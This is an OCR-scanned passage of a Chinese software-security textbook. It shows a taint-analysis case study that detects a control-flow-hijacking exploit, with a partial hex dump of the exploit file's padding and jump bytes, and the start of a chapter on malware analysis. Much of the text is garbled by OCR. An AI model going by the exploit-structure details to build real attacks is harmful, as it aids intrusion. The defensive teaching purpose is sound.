info.dta recordlog dta 
B Desktop 
M Downloads 
画 Tash 
Computer Minor 
二 = Jh exziBFAr8 1808 e 
SR Browse Network 90625 eX21BFAFS 4696 708 
TL ————— oeszs exziBFAF8 4696 708 
lii Documents 


7-22 通过 AOTA 获取 的 污点 源 信息 


接 下 来 ,需要 提取 漏洞 利用 攻击 时 的 程序 执行 记录 并 在 此 基础 上 完成 污点 分 析 
(图 7-22 中 的 info. dta 和 recordlog. dta 分 别 对 应 AOTA 运行 时 获取 的 污点 源 文件 和 执 
行 记 录 文 件 )。 这 里 利用 AOTA 读 取 执行 记录 中 的 前 100 条 指令 ,图 7-23 展示 了 相关 的 
指令 内 容 以 及 程序 执行 各 条 指令 时 各 寄存 器 ,操作 数 以 及 线程 等 运行 时 信息 。 


[ee 


ue EAX | ECX | EDX | EBX 指令 esp | EBP | tS | eoi | or om mw g 





图 7-23 AOTA 读 取 程序 执行 记录 


最 后 ,根据 污点 源 信息 info. dta 和 程序 执行 记录 recordlog. dta 进行 污点 分 析 。 图 7- 
24 展示 了 AOTA 系统 的 污点 传播 结果 ,可 以 看 到 ,其 中 第 129 857 条 指令 call ecx 中 的 
跳 转 目标 0x401ca9 是 污点 数据 ,根据 7. 3.5 节 介 绍 的 常用 污点 误 用 检测 规则 即 可 判定 程 
序 此 时 遭受 了 控制 流动 持 类 型 的 漏洞 利用 攻击 。 
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尽管 通过 污点 传播 分 析 可 以 发 现 程序 执行 过 程 中 存在 漏洞 利用 攻击 ,但 是 如 果 需 要 
进一步 掌握 该 漏洞 攻击 的 具体 过 程 ,例如 其 跳 转 目标 地 址 是 否 直接 来 源 于 原始 文件 或 者 
是 通过 一 系列 的 计算 后 得 到 的 结果 ,还 需要 借助 AOTA 系统 的 污点 回溯 分 析 功 能 。 
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图 7-25 展示 了 相关 的 回溯 结果 。 


标 | 搜索 日 


记录 ID 





图 7-25 污点 回溯 分 析 结 果 


通过 污点 回溯 分 析 结 果 可 以 看 到 ,最 终 的 污点 地 址 是 经 过 一 系列 mov、push 


移动 指令 得 到 的 ,其 间 并 没有 任何 计算 指令 的 干预 ,因此 可 以 判定 该 漏洞 攻击 过 程 


将 原始 文件 中 的 数据 作为 程序 跳 转 的 目标 地 址 。 而 为 了 验证 该 结果 的 正确 性 , 结 
源 信息 以 及 回溯 分 析 结 果 ,在 文件 0x408 偏 移 处 找到 了 程序 执行 时 使 用 到 的 目标 
hE 0x401ca9 ,如 图 7-26 所 示 ( 注 意 ,文件 中 是 低地 址 在 前 ,高 地 址 在 后 ) 。 

















等 数据 
中 直接 
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4S3HBH& s Rl khRi2cawaasmua3LbiBEEEPRISErERzxavrxue[ 





XHA SEH ZAS AAV EAN) FSU GC) A0 ZAR) me) EOW) ? 

















Addresa |0|]1|2|3 4/|[5|]6:7|8]9|ai|lb|jc|d|e!ti|DunE 

00000390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
000003a0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
000003b0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
000003cO 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
00000340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
000003e0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
000003f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAP 
00000400 41 41 41 41 eb 08 90 90 EEECZETEN 50 90 90 50 ARRR3 .3? 国 
00000410 90 90 90 90 90 90 90 90 90 90 90 90 db de bd bc 


图 7-26 程序 跳 转 时 用 到 的 目标 地 址 数据 





7.6 总 结 


污点 分 析 方法 经 过 了 10 多 年 的 长 足 发 展 ,目前 已 成 功 应 用 在 敏感 信息 泄露 .恶意 代 
码 检测 以 及 软件 漏洞 分 析 等 领域 ,已 经 成 为 软件 安全 分 析 领 域 中 的 一 种 重要 基础 方法 与 
技术 手段 。 尽 管 如 此 ,污点 分 析 方 法 仍然 面临 着 难以 克服 的 问题 ,例如 在 本 章 中 提 到 的 传 
播 规则 粒度 和 可 靠 性 问题 以 及 隐 式 污点 传播 等 问题 都 一 定 程度 上 制约 了 污点 分 析 的 
发 展 。 

本 章 首 先 介绍 了 静态 污点 分 析 和 动态 污点 分 析 的 基本 原理 ,其 中 静态 污点 分 析 采 用 
在 代码 中 标记 类 型 修饰 的 方式 , 适 于 进行 软件 漏洞 方面 的 挖掘 工作 ;而 动态 污点 分 析 通 过 
指令 插 装 的 方式 实现 更 为 精确 的 污点 分 析 过 程 ,因此 得 到 了 更 多 研究 人 员 的 青睐 。 随 后 ， 
本 书 重 点 描述 了 动态 污点 分 析 过 程 的 3 个 主要 步骤 , 即 污点 源 识别 污点 动态 跟踪 以 及 污 
点 误 用 检测 等 。 其 中 在 介绍 污点 动态 跟踪 的 同时 还 涉及 了 污点 内 存 映 射程 序 动态 监控 
以 及 传播 规则 设计 等 内 容 。 在 讲述 相关 基础 方法 和 技术 之 后 ,本 章 还 介绍 了 近 几 年 出 现 
的 具有 一 定 代表 性 的 典型 系统 ,包括 面向 网 络 恶意 代码 检测 的 TaintCheck 系统 .面向 污 
点 分 析 基 础 平台 的 TEMU 系统 以 及 面向 大 规模 实际 应 用 的 AOTA 系统 。 最 后 ,通过 实 
例 分 析 展 示 了 污点 分 析 方 法 在 软件 漏洞 利用 攻击 检测 方面 的 具体 应 用 情况 ,阐明 了 该 方 
法 的 实用 价值 。 
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恶意 代码 检测 与 分 析 


恶意 代码 检测 与 分 析 是 软件 安全 性 分 析 的 一 种 重要 应 用 形式 ,也 是 软件 安全 性 分 析 


技术 领域 里 较为 常见 的 一 种 应 用 形式 。 由 于 恶意 代码 与 普通 软件 一 样 都 是 程序 代码 , 因 
此 ,恶意 代码 的 检测 与 分 析 具 有 与 普通 软件 的 安全 性 分 析 一 样 的 典型 问题 与 技术 方法 , 同 


时 ,由 于 恶意 代码 是 攻击 者 有 意 编 写 的 带 有 特定 攻击 目的 的 代码 ,因此 ,恶意 代码 的 检测 
与 分 析 又 具有 不 同 于 普通 软件 的 安全 性 分 析 的 特殊 问题 和 相应 的 技术 方法 。 

在 本 章 中 ,首先 简要 介绍 恶意 代码 的 类 型 以 及 不 同类 型 恶意 代码 的 特点 ,并 阐述 恶意 
代码 分 析 的 目的 以 及 在 分 析 过 程 中 需要 注意 的 事项 。 其 次 ,以 一 般 恶 意 代码 分 析 的 典型 
流程 为 主线 ,介绍 基本 的 静态 分 析 和 动态 分 析 方 法 ,以 及 常见 的 静态 分 析 和 动态 分 析 工 具 
和 它们 的 使 用 方式 。 接 着 ,介绍 恶意 代码 分 析 中 特有 的 分 析 对 抗 技 术 , 并 以 反 虚 拟 化 分 析 
对 抗 和 恶意 代码 还 原 为 重点 ,介绍 相应 的 理论 方法 和 技术 。 然 后 ,重点 关注 恶意 代码 攻击 
过 程 中 最 为 重要 的 软件 漏洞 利用 过 程 , 通 过 对 软件 漏洞 利用 过 程 中 内 存 使 用 .代码 属性 、 
控制 流 完整 性 、 系 统 状态 等 各 种 状态 属性 的 分 析 和 检测 ,介绍 当前 这 一 领域 学 术 界 的 各 种 
研究 成 果 。 最 后 ,通过 对 若干 不 同类 型 的 恶意 代码 的 实际 分 析 , 展 示 典 型 的 恶意 代码 分 析 
过 程 和 分 析 结 果 。 





8.1 恶意 代码 分 析 基 础 
811 恶意 代码 分 类 


1988 年 11 月 2 日 ,Robert Tappan Morris 从 MIT 释放 了 只 有 99 行 代 码 的 Morris 
蠕虫 ,此 后 恶意 代码 的 种 类 和 数量 不 断 增多 ,并 且 随 着 计算 机 软 硬 件 的 飞速 发 展 和 互联 网 
规模 的 不 断 扩大 ,恶意 代码 的 表现 形态 传播 方 式 、 攻 击 方法 也 不 断 变 化 ,出 现 了 各 种 类 型 
的 恶意 代码 ,不 同类 型 的 恶意 代码 在 功能 特点 、 目 标定 位、 攻击 技术 .代码 实现 等 方面 各 有 具 
特点 。 在 恶意 代码 分 析 过 程 中 ,可 以 根据 观察 到 的 恶意 行为 和 特征 推断 样本 所 属 的 分 类 ， 
同时 ,也 可 以 根据 样本 类 别 推测 样本 可 能 具有 的 行为 特征 ,从 而 选择 更 具 针 对 性 的 分 析 方 
法 和 工具 。 

传统 上 ,按照 恶意 代码 的 功能 来 区 分 ,将 其 分 为 病毒 .蠕虫 .木马 、 后 门 、 僵 尸 程序 .下 
Pir Rootkit 恐吓 软件 .勒索 软件 等 。 

根据 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ), 计 算 机 病毒 (computer virus) 
是 指 编制 或 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 毁坏 数据 ,影响 计算 机 使 用 ,并 
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能 自我 复制 的 一 组 计算 机 指令 或 者 程序 代码 。 这 是 一 个 较为 宽泛 的 定义 。 人 们 一 般 认为 
病毒 是 附着 于 程序 或 文件 中 的 一 段 计算 机 代码 , 它 可 在 计算 机 与 计算 机 之 间 传 播 ,并 在 传 
播 途中 感染 计算 机 ,其 明确 目的 是 自我 复制 。 病 毒 更 多 地 是 从 其 传播 方式 上 界定 的 ,其 功 
能 是 破坏 软件 、 硬 件 和 数据 ,并 且 , 由 于 计算 机 病毒 这 一 名 称 是 将 恶意 代码 与 生物 病毒 相 
类 比 , 因 此 ,人 们 通常 也 用 计算 机 病毒 或 病毒 来 笼统 地 指 代 恶意 代码 。 

蠕虫 (worm) 与 病毒 类 似 ,可 视 为 一 种 通过 网 络 传播 的 恶性 病毒 , 它 具 有 病毒 的 一 些 
共性 , 某 种 程度 上 可 视 为 病毒 的 子 类 。 蠕 虫 也 在 计算 机 与 计算 机 之 间 自 我 复制 ,但 蠕虫 可 
自动 完成 复制 过 程 ,并 且 不 依赖 于 寄生 的 宿主 文件 ,可 独自 传播 。 蠕 虫 传播 无 须 人 为 干 
预 ,并 可 通过 网 络 自我 复制 ,进而 大 量 消耗 系统 内 存 或 网 络 带 宽 , 并 导致 计算 机 停止 响应 、 
网 络 拥塞 等 情况 ,造成 严重 危害 。 

木马 (trojan horse) ,也 叫 特洛伊 木马 , 指 那些 表面 上 是 有 用 的 软件 ,实际 目的 却 是 危 
害 计算 机 安全 并 破坏 计算 机 的 程序 。 它 是 具有 欺骗 性 .隐蔽 性 和 非 授 权 性 的 特点 ,通常 被 
攻击 者 用 作 远程 控制 的 工具 。 

后 门 (backdoor) 与 木马 类 似 , 也 是 为 攻击 者 提供 不 需要 授权 或 采用 攻击 者 预 置 的 授 
权 就 可 访问 受害 者 系统 的 程序 ,通常 也 用 于 远程 访问 并 控制 受害 者 系统 。 与 木马 不 同 的 
是 ,后 门 通常 不 是 一 个 可 以 独立 存在 的 程序 ,而 是 指 一 个 可 被 攻击 者 使 用 的 恶意 功能 
模块 。 

伪 尸 程序 (bot) 也 与 木马 类 似 , 也 可 为 攻击 者 提供 控制 受害 者 系统 的 功能 ,但 所 有 仿 
尸 程序 会 相互 连接 组 成 僵尸 网 络 (botnet) ,并 接收 控制 者 发 送 的 控制 命令 ,执行 相同 的 

下 载 器 (downloader) 是 用 于 下 载 、 安 装 和 执行 其 他 恶意 代码 的 恶意 代码 。 通 常 下 载 
器 的 体积 较 小 ,功能 也 较为 单一 ,容易 植 信 、 感 染 和 传播 ,并 在 感染 受害 者 系统 之 后 再 进 一 
步 下 载 后 续 具 有 实际 攻击 、 破 坏 作 用 的 恶意 代码 ,在 针对 浏览 器 的 攻击 以 及 一 些 采 用 模块 
化 设计 的 恶意 代码 中 较为 常见 。 

Rootkit 是 指 用 于 隐藏 恶意 代码 存在 .干扰 恶意 代码 检测 的 恶意 代码 ,通常 其 采用 内 
核 级 技术 实现 ,以 系统 驱动 等 形式 存在 ,并 与 其 他 具有 攻击 、 破 坏 功能 的 恶意 代码 如 后 门 、 
木马 等 共同 组 成 恶意 软件 。 

恐吓 软件 (scareware) 是 指 通过 虚假 的 信息 恐吓 受害 者 , 诱 使 受害 者 购买 特定 产品 的 
恶意 软件 。 通 常 , 您 吓 软 件 会 将 自身 伪装 成 杀毒 软件 、 司 法 取证 工具 等 ,然后 通过 展示 恶 
意 软件 感染 、 网 络 违法 行为 等 具有 诱骗 性 的 虚假 信息 ,诱导 受害 者 支付 一 定 的 费用 以 解决 
相应 的 “问题 ”。 

勒索 软件 (ransomware) 是 一 种 绑架 用 户 数据 并 借 此 向 用 户 勤 索 钱财 的 恶意 软件 。 
攻击 者 通过 植 人 受 感染 主机 的 恶意 软件 加 密 受 害 者 的 数据 ,通常 会 将 系统 上 的 文档 、 邮 
件 、 代 码 、 图 片 等 各 种 类 型 的 文件 进行 高 强度 加 密 , 使 受害 者 无 法 正常 使 用 这 些 数据 ,然后 
通过 弹出 窗口 .生成 文本 文件 等 方式 向 受害 者 发 出 勒索 通知 ,要 求 受害 者 向 指定 账户 汇款 
(通常 是 比特 币 等 匿名 电子 货币 ) 来 获得 解密 文件 的 密 钥 和 方法 。 

如 上 所 述 ,不 同 种 类 的 恶意 代码 具有 不 同 的 功能 特点 和 攻击 目的 ,并 且 正 如 恶意 代码 
这 一 名 称 表明 的 那样 ,一 个 具有 攻击 性 、 破 坏 性 的 恶意 代码 并 不 一 定 是 一 个 完整 的 程序 或 
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软件 ,可 以 仅仅 是 一 段 代码 ,甚至 是 数据 。 需 要 注意 的 是 ,恶意 代码 的 准确 分 类 是 困难 的 ， 


不 同类 型 恶意 代码 的 划分 标准 也 是 模糊 的 ,一 个 恶意 代码 可 能 跨越 多 个 类 别 ,不 同 的 安全 
机 构 对 同一 个 恶意 代码 的 归 类 也 可 能 不 一 致 。 因 此 ,在 恶意 代码 分 析 中 ,需要 关注 恶意 代 


码 的 主要 功能 特征 ,并 据 此 对 恶意 代码 类 别 进行 判定 。 

除了 以 功能 划分 恶意 代码 ,在 恶意 代码 分 析 过 程 中 ,还 可 以 根据 其 他 属性 来 区 分 不 同 
类 型 的 恶意 代码 ,从 而 采取 有 针对 性 的 分 析 方 法 。 

如 按照 恶意 代码 文件 是 否 可 以 直接 执行 来 区 分 ,可 以 分 为 可 执行 的 代码 文件 、. 非 可 执 
行 的 数据 文件 。 其 中 可 执行 的 代码 文件 又 可 以 进一步 分 为 直接 可 执行 的 代码 文件 ,如 
exe 等 ,以 及 有 条 件 可 执行 的 代码 文件 ,如 Java、. NET, VBScript, JavaScript 等 依赖 于 特 
定 运行 环境 的 中 间 语 言 、. 脚 本 语言 代码 。 对 于 直接 可 执行 的 恶意 代码 ,可 以 通过 静态 扫 
描 、 虚 拟 执行 等 方式 进行 分 析 ; 对 于 有 条 件 可 执行 的 恶意 代码 ,需要 首先 识别 其 代码 类 型 ， 
构造 需要 的 执行 条 件 , 如 安装 配置 相应 的 运行 环境 ,再 进行 动态 分 析 , 也 可 以 通过 各 种 中 
间 语 言 解释 器 进行 虚拟 执行 ;而 对 于 非 可 执行 的 数据 文件 ,如 文本 文件 图片 . 音 视频 等 多 
媒体 文件 等 ,可 以 根据 文件 类 型 和 结构 静态 分 析 文 件 是 否 有 异常 ,也 可 以 根据 文件 类 型 构 
造 相 应 的 动态 分 析 环 境 对 样本 文件 进行 分 析 , 检 测 其 中 是 否 包 含 恶 意 代 码 。 

按照 恶意 代码 感染 .传播 .破坏 等 生命 周期 各 个 阶段 中 是 否 利用 了 软件 漏洞 ,可 以 分 
为 不 依赖 软件 漏洞 的 恶意 代码 和 依赖 软件 漏洞 的 恶意 代码 。 对 于 不 依赖 软件 漏洞 的 恶意 
代码 ,攻击 过 程 通常 比较 直接 ,在 恶意 代码 投递 传播 等 环节 通过 社交 欺骗 等 方式 进行 ,如 
感染 U 盘 .诱骗 下 载 . 拥 绑 安装 等 。 而 依赖 软件 漏洞 的 恶意 代码 通过 利用 特定 的 软件 漏 
洞 进行 植 和 人、 传播 ,可 以 在 用 户 不 察觉 的 情况 下 开展 攻击 ,但 由 于 软件 漏洞 的 利用 成 功率 
难以 保证 ,可 能 无 法 成 功 攻 击 。 因 此 ,在 分 析 依 赖 软件 漏洞 的 恶意 代码 时 ,需要 猜测 恶意 
代码 利用 的 软件 漏洞 ,并 构造 相应 的 软件 漏洞 利用 环境 ,因此 常常 需要 进行 多 次 的 迭代 
分 析 。 


8.12 恶意 代码 分 析 的 目的 


分 析 一 个 恶意 代码 ,目的 是 为 了 分 析 恶 意 代 码 的 攻击 过 程 、 功 能 作用 ,评估 恶意 代码 
造成 的 破坏 和 影响 ,提取 恶意 代码 检测 的 特征 ,修补 恶意 代码 利用 的 漏洞 ,防范 类 似 安全 
事件 的 再 次 发 生 。 然 而 ,全 面 、 准 确 . 快 速 地 分 析 一 个 恶意 代码 有 时 候 是 十 分 困难 的 ,甚至 
是 不 可 能 的 ,因此 ,在 开展 恶意 代码 分 析 时 ,需要 明确 分 析 的 目的 ,从 而 提高 分 析 效 率 , 避 
免 陷于 庞杂 的 技术 细节 之 中 而 忽略 了 我 们 真正 想 要 的 结果 。 

通常 ,分 析 一 个 恶意 代码 时 主要 关心 如 下 几 个 问题 : 是 不 是 ,做 什么 , 谁 干 的 ,如 何 
做 的 。 

其 中 ,“ 是 不 是 ”主要 是 确定 一 个 可 疑 代码 是 不 是 恶意 代码 。 最 简单 的 办 法 是 通过 杀 
毒 软件 扫描 等 方式 ,利用 已 知 的 恶意 代码 特征 进行 匹配 ,快速 判断 可 疑 代码 是 不 是 恶意 代 
码 。 但 对 于 恶意 代码 分 析 工 作 而 言 ,很 多 时 候 处 置 的 对 象 是 新 发 现 的 、 尚 未 有 可 匹配 特征 
的 恶意 代码 ,因此 ,需要 通过 静态 分 析 代码 逻辑 ,动态 观察 代码 行为 等 方式 ,根据 可 疑 代 码 
是 否 有 漏洞 利用 是否 包含 后 门 等 属性 ,对 是 不 是 恶意 代码 的 问题 做 出 客观 判断 。 

“做 什么 主要 是 确定 恶意 代码 具有 什么 功能 。 不 论 是 进行 远程 控制 ,收集 秘密 数据 ， 
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还 是 进行 系统 破坏 .敲诈 勒索 , 亦 或 单纯 的 资源 消耗 ,如 发 送 垃圾 邮件 .计算 比特 币 等 ,从 
一 个 恶意 代码 的 功能 能 够 推断 出 该 恶意 代码 的 攻击 目的 ,从 而 有 效 评 估 攻 击 的 影响 和 造 
成 的 破坏 ,以 便 采 取 相 应 的 恶意 代码 清除 受害 系统 恢复 以 及 网 络 攻击 防范 措施 。 

“ 谁 干 的 ?主要 是 确定 恶意 代码 的 来 源 以 及 其 背后 的 攻击 者 ,也 就 是 攻击 溯源 问题 。 
对 于 司法 机 关 和 监管 机 构 ,这 是 一 个 重要 的 关切 点 。 对 恶意 代码 分 析 工 作 而 言 , 可 以 从 恶 
意 代 码 中 提取 一 些 有 用 的 信息 ,如 恶意 代码 相关 的 IP、 域 名 ,甚至 邮箱 、 手 机 号 等 信息 , 同 
时 ,还 可 以 利用 模块 结构 .代码 逻辑 甚至 编码 风格 等 进行 同族 判定 ,在 相关 的 恶意 代码 之 
间 建 立 关联 关系 ,从 而 利用 多 种 信息 定位 恶意 代码 背后 的 攻击 者 。 

“如 何 做 的 ”主要 是 分 析 恶 意 代 码 的 攻击 方式 及 其 技术 原理 。 对 于 一 个 新 型 的 恶意 代 
码 ,和 弄 清楚 其 攻击 途径 和 攻击 方式 ,确定 其 是 通过 电子 邮件 投递 还 是 通过 网 页 挂 马 感染 ， 
是 通过 社交 欺骗 传播 还 是 利用 软件 漏洞 植 入 ,对 于 发 现 现 有 安全 防御 系统 的 弱点 ,完善 和 
改进 网 络 安全 防御 系统 具有 重要 意义 。 

在 分 析 完 一 个 恶意 代码 之 后 ,一 个 很 重要 的 工作 就 是 如 何 发 现 其 他 的 已 感染 主机 。 
对 于 安全 分 析 人 员 而 言 ,可 以 通过 寻找 恶意 代码 感染 迹象 (Indicators Of Compromise, 
IOC) 来 实现 , 即 可 以 用 来 标识 一 台 主机 、 一 个 网 络 受到 入 侵 的 痕迹 ,通常 TOC 是 一 些 可 观 
察 、. 可 衔 量 .可 检测 .可 重 现 的 事件 .属性 或 对 象 , 比 如 注册 表 键 值 . 互 斥 量 文件 名 等 ,并 将 
这 些 可 以 作为 感染 证 据 的 信息 提取 出 来 ,制作 成 某 种 标准 格式 的 威胁 情报 ,以 便 与 他 人 共 
享 和 利用 工具 自动 化 查找 其 他 已 感染 主机 。 

在 安全 威胁 情报 的 标准 化 方面 ,为 了 在 不 同 的 安全 机 构 之 间 更 好 地 共享 这 些 安全 情 
报信 息 , 由 Mandiant 制定 的 IOC 标准 OpenIOC 已 经 开源 ,该 标准 通过 可 扩展 的 XML 模 
式 语言 描述 已 知 威胁 的 技术 特征 ,攻击 方法 、 感 染 迹 象 等 威胁 情报 ,利用 这 些 威胁 情报 ,其 
他 支持 该 标准 的 工具 可 以 发 现 未 知 的 已 感染 主机 。 当 前 ,已 经 有 一 些 工 具 可 以 帮助 分 析 
人 员 简 化 TOC 生成 过 程 , 如 Mandiant IOC Finder, 该 工具 是 一 个 命令 行 工具 ,可 以 收集 
受 恶 意 代码 感染 的 主机 上 的 数据 ,并 自动 生成 TOC 文件 。 同时, 分析 人 员 也 可 以 利用 
Mandiant IOC Editor 等 工具 对 IOC 文件 进行 手工 编辑 ,以 便 制定 更 加 准确 的 TOC 文件 。 
然后 ,分 析 人 员 可 以 利用 Redline 等 工具 ,依据 自身 制定 或 他 人 共享 的 TOC 文件 ,对 系统 
中 其 他 的 主机 进行 检测 ,发 现 其 他 受 感 染 的 主机 。 关 于 IOC 的 标准 规范 、 文 件 格式 及 相 
关 工 具 , 可 以 参见 OpenIOC HAO, 

事件 对 象 描述 与 交换 格式 (Incident Object Description Exchange Format, IODEF) 
是 另外 一 种 安全 情报 数据 格式 标准 , 它 定 义 了 一 种 数据 表示 格式 框架 ,用 于 规范 计算 机 安 
全 事件 响应 组 织 之 间 交 换 的 计算 机 安全 事件 相关 信息 。 它 同样 基于 XML 模式 ,其 具体 
格式 规范 可 参见 RFC 50709, 


813 典型 分 析 流程 
恶意 代码 分 析 通 常 是 复杂 和 困难 的 ,需要 花费 很 多 时 间 和 精力 ,因此 ,在 进行 恶意 代 


(D http://openioc. org/. 
Q http://www. ietf. org/ríc/rfc5070. txt. 
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码 分 析 时 要 遵循 循序 渐进 的 原则 , 先 对 恶意 代码 进行 一 个 总 体 性 的 初步 分 析 ,然后 再 逐步 
深入 ,不 要 一 开始 就 陷入 细节 ,通过 对 主要 行为 和 功能 的 分 析 , 先 对 恶意 代码 有 一 个 概要 
性 的 了 解 ,再 对 关键 点 进行 深入 分 析 。 

通常 ,在 拿 到 一 个 可 疑 的 恶意 代码 样本 时 ,典型 的 分 析 流 程 包 括 : 用 成 熟 工具 进行 快 
速 的 静态 属性 分 析 , 识 别 已 经 有 分 析 结 果 的 样本 ,避免 重复 分 析 。 在 完成 可 疑 样本 的 静态 
属性 分 析 之 后 ,可 以 进一步 开展 静态 代码 分 析 , 对 样本 文件 代码 进行 初步 的 反 汇 编 分 析 ， 
识别 其 中 的 混淆 代码 ,大 致 了 解 代码 结构 和 执行 流程 。 对 于 可 执行 代码 格式 的 样本 而 言 ， 
静态 代码 分 析 可 以 帮助 分 析 人 员 确 定 样本 的 组 成 结构 和 大 致 功能 ;对 于 非 可 执行 格式 的 
样本 ,静态 代码 分 析 可 以 辅助 分 析 人 员 初 步 判 断 样本 是 否 包含 恶意 代码 。 根 据 静 态 属性 
分 析 的 结果 和 样本 文件 类 型 ,结合 样本 文件 来 源 等 信息 ,为 动态 分 析 准 备 合适 的 分 析 环 
境 , 然 后 选取 合适 的 分 析 方 法 和 工具 ,执行 恶意 代码 进行 动态 分 析 , 观 察 恶意 代码 的 行为 
和 功能 。 最 后 ,再 根据 静态 分 析 和 动态 分 析 的 结果 ,对 恶意 代码 的 攻击 过 程 、 功 能 特点 、 实 
现 机 理 等 关键 点 进行 深入 分 析 。 

由 于 恶意 代码 的 多 样 性 ,在 开展 恶意 代码 分 析 时 需要 综合 利用 各 种 工具 和 方法 ,没有 
一 种 方式 是 万 能 的 ,每 一 个 工具 和 方法 都 有 其 特点 和 局 限 性 ,通过 搜索 引擎 和 各 种 工具 书 
籍 ,可 以 发 现 有 很 多 已 有 的 工具 ,多 尝试 一 些 , 找 到 自己 称 手 的 工具 集合 。 本 书 在 介绍 基 
本 的 分 析 方 法 和 工具 的 基础 上 ,将 更 多 地 关注 近年 来 学 术 界 提出 的 一 些 技 术 方 法 ,以 及 基 
于 这 些 技术 方法 研制 的 工具 系统 。 但 这 并 不 代表 这 些 工具 系统 就 一 定 比 其 他 的 工具 软件 
更 好 ,不 同 的 工具 针对 的 问题 不 同 ,具有 各 自 不 同 的 特性 ,选用 合适 的 工具 解决 对 应 的 问 
题 才 是 关键 。 
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在 对 恶意 代码 进行 分 析 过 程 中 ,需要 重点 关注 软件 漏洞 利用 过 程 的 分 析 ,尤其 是 对 于 
在 利用 基础 的 静态 分 析 \ 动 态 分 析 已 经 发 现 恶意 代码 具有 一 些 高 级 攻击 特征 和 软件 漏洞 
利用 痕迹 时 ,通过 软件 漏洞 利用 过 程 分 析 可 以 帮助 我 们 确定 恶意 代码 在 植 人 和 攻击 过 程 
中 是 否 利用 了 软件 漏洞 ,利用 的 是 已 知 的 软件 漏洞 还 是 未 知 的 软件 漏洞 ,漏洞 的 类 型 和 位 
置 ,以 及 具体 的 漏洞 利用 方式 。 通 过 这 些 信息 ,可 以 进一步 判断 该 恶意 代码 的 危害 性 ,并 
及 时 采取 有 效 的 应 对 措施 。 

在 APT 等 高 级 攻击 活动 中 ,浏览 器 、 办 公 软 件 、 文 档 处 理 器 等 流行 应 用 软件 的 漏洞 
被 大 量 利用 。 根 据 软件 漏洞 利用 过 程 中 是 否 动 持 程序 的 控制 流 , 软 件 漏洞 可 以 分 为 控制 
流动 持 类 漏洞 和 非 控制 流动 持 类 漏洞 两 类 。 

控制 流动 持 类 漏洞 是 通过 自 改 程序 中 函数 指针 、 返 回 地 址 等 控制 流转 移 目 标 数 据 来 
动 持 程序 ,并 将 程序 执行 流 导向 攻击 者 构造 的 代码 来 实现 漏洞 利用 攻击 。 而 非 控 制 流动 
持 类 漏洞 主要 是 通过 自 改 程序 关键 的 非 控制 流 相关 的 数据 来 改变 程序 执行 路 径 , 实 现 漏 
洞 利用 攻击 。 

在 控制 流 劫持 类 漏洞 中 ,攻击 者 通过 修改 控制 流 相关 的 数据 , 自 改 程序 中 的 call, 
jmp.ret 等 控制 流转 移 指令 的 操作 数 , 将 程序 执行 流程 导向 特定 的 代码 位 置 。 在 控制 流 
劫持 类 漏洞 利用 过 程 中 ,攻击 者 需要 构造 或 插入 一 段 shellcode, 从 而 在 成 功 劫持 程序 控 
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制 流 后 可 以 执行 shellcode。 

控制 流 支持 类 漏洞 的 产生 原因 可 以 有 多 种 ,典型 的 成 因 包括 栈 溢出 、 堆 溢出 、 指 针 引 
用 错误 等 。 溢 出 类 漏洞 是 由 于 没有 对 内 存 越界 问题 进行 检查 ,导致 数据 越过 缓冲 区 的 范 
围 ,可 能 造成 关键 控制 流 元 素 的 算 改 。 对 于 栈 溢 出 而 言 ,被 覆盖 的 控制 流 元 素 可 能 是 函数 
的 返回 地 址 或 者 保存 在 栈 中 的 函数 指针 ,如 SEH 异常 处 理 例 程 地 址 等 。 对 于 堆 溢 出 而 
言 , 被 溢出 内 容 所 覆盖 的 数据 可 能 是 C++ 虚 函数 指针 或 者 构成 堆 数据 结构 的 元 数据 等 。 
而 指针 引用 错误 类 漏洞 是 由 于 在 程序 中 某 些 指针 没有 指向 合法 的 对 象 ,在 对 这 些 指针 进 
行 解 引用 时 ,可 能 会 导致 内 存 访问 错误 。 攻 击 者 能 够 控制 非法 指针 指向 的 内 容 ,截获 程序 
执行 权 , 从 而 导致 应 用 程序 被 恶意 攻击 。 常 见 的 由 于 指针 引用 错误 所 导致 的 漏洞 包括 指 
针 两 次 释放 漏洞 (Double Free) 释放 之 后 再 引用 漏洞 (Use After Free,UAF) 等 。 

当前 大 多 数 的 漏洞 都 属于 控制 流 劫持 类 漏洞 ,攻击 者 关注 的 是 如 何 算 改 控制 相关 的 
数据 夺取 漏洞 程序 的 执行 控制 权 , 如 函数 返回 地 址 、 全 局 偏 移 表 (GOT) 中 函数 指针 、 结 构 
化 异常 处 理 模块 中 的 指针 、 虚 表 的 函数 指针 等 。 然 而 ,Shuo Chen 等 人 中 的 相关 研究 也 
表明 ,系统 中 很 多 非 控 制 相关 的 数据 也 是 非常 关键 的 数据 , 随 着 控制 相关 数据 的 防御 机 制 
逐渐 完善 ,攻击 者 会 不 断 尝试 利用 非 控制 相关 数据 开展 攻击 ,通常 修改 应 用 程序 相关 的 配 
置 数据 .用户 输入 数据 .用户 身 份 信息 和 与 关键 条 件 判 断 相 关 的 数据 等 达到 漏洞 利用 的 
目的 。 

Shuo Chen 等 人 5 的 研究 表明 非 控制 流 劫持 类 漏洞 不 仅 是 可 行 的 ,并 且 同 样 可 能 
造成 严重 危害 。 例 如 ,网 络 服务 器 类 应 用 程序 NullHttpd 中 ,攻击 者 可 以 通过 程序 中 存 
在 的 堆 洲 出 漏洞 算 改 保存 在 CGLBIN 中 的 网 络 配置 字符 串 , 从 而 造成 应 用 程序 的 权限 
被 恶意 提升 为 root。 在 另 一 款 的 HTTP 服务 器 软件 GHTTPD 中 ,用 户 输入 过 长 的 数 
据 会 导致 栈 溢出 。 攻 击 者 可 以 利用 这 个 栈 江 出 漏洞 覆盖 栈 中 特定 指针 的 值 , 使 其 指向 
用 户 输入 数据 中 特定 的 字符 串 , 并 且 使 该 字符 串 满足 后 续 程 序 中 的 条 件 判断 ,从 而 以 
